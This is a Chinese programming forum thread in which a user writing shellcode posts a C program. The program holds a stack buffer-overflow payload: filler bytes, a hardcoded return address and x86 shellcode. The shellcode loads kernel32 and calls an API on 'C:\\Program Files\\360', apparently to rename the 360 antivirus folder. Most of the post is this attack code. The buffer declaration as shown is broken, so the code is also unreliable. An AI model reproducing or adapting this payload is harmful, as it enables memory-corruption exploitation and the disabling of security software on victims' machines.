换编码_转_机器码_待解决
本帖最后由 涛4091 于 2023-2-23 11:05 编辑地址为什么自动加上了 ff 贴代码 本帖最后由 jackz007 于 2019-5-10 17:45 编辑
既然是地址,那就很可能是重定位项,从文件中读取到的数值和实际加载后的数值不一样很正常。
楼主这是在切分汇编指令,自己动手写反汇编引擎?很 NB 嘛! jackz007 发表于 2019-5-10 17:36
既然是地址,那就很可能是重定位项,从文件中读取到的数值和实际加载后的数值不一样很正常。
...
写shellcode 人造人 发表于 2019-5-10 17:35
贴代码
呐 代码
#include<windows.h>
#include<stdio.h>
char input[]=
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x6b\x8c\x49\x7e"
"\x55"
"\x8B\xEC"
"\x83\xEC\x20"
"\xB8\x6B\x65\x72\x6E"
"\x89\x45\xF0"
"\xB8\x65\x6C\x33\x32"
"\x89\x45\xF4"
"\xB8\x2E\x64\x6C\x6C"
"\x89\x45\xF8"
"\x8D\x45\xF0"
"\x50"
"\xBA\x7B\x1D\x80\x7C"
"\xFF\xD2"
"\x55"
"\x8B\xEC"
"\x83\xEC\x30"
"\xB8\x43\x3A\x5C\x5C"
"\x89\x45\xD0"
"\xB8\x50\x72\x6F\x67"
"\x89\x45\xD4"
"\xB8\x72\x61\x6D\x20"
"\x89\x45\xD8"
"\xB8\x46\x69\x6C\x65"
"\x89\x45\xDC"
"\xB8\x73\x5C\x5C\x33"
"\x89\x45\xE0"
"\xB8\x36\x30\x00\x00"
"\x89\x45\xE4"
"\x8D\x7D\xD0"
"\xB8\x43\x3A\x5C\x5C"
"\x89\x45\xE8"
"\xB8\x50\x72\x6F\x67"
"\x89\x45\xEC"
"\xB8\x72\x61\x6D\x20"
"\x89\x45\xF0"
"\xB8\x46\x69\x6C\x65"
"\x89\x45\xF4"
"\xB8\x73\x5C\x5C\x33"
"\x89\x45\xF8"
"\xB8\x36\x30\x31\x00"
"\x89\x45\xFC"
"\x8D\x75\xE8"
"\x56"
"\x57"
"\xB8\xA7\x5E\x83\x7C"
"\xFF\xD0";
int main()
{
char buff;
LoadLibrary("user32.dll");
strcpy(buff,input);
return 0;
}
页:
[1]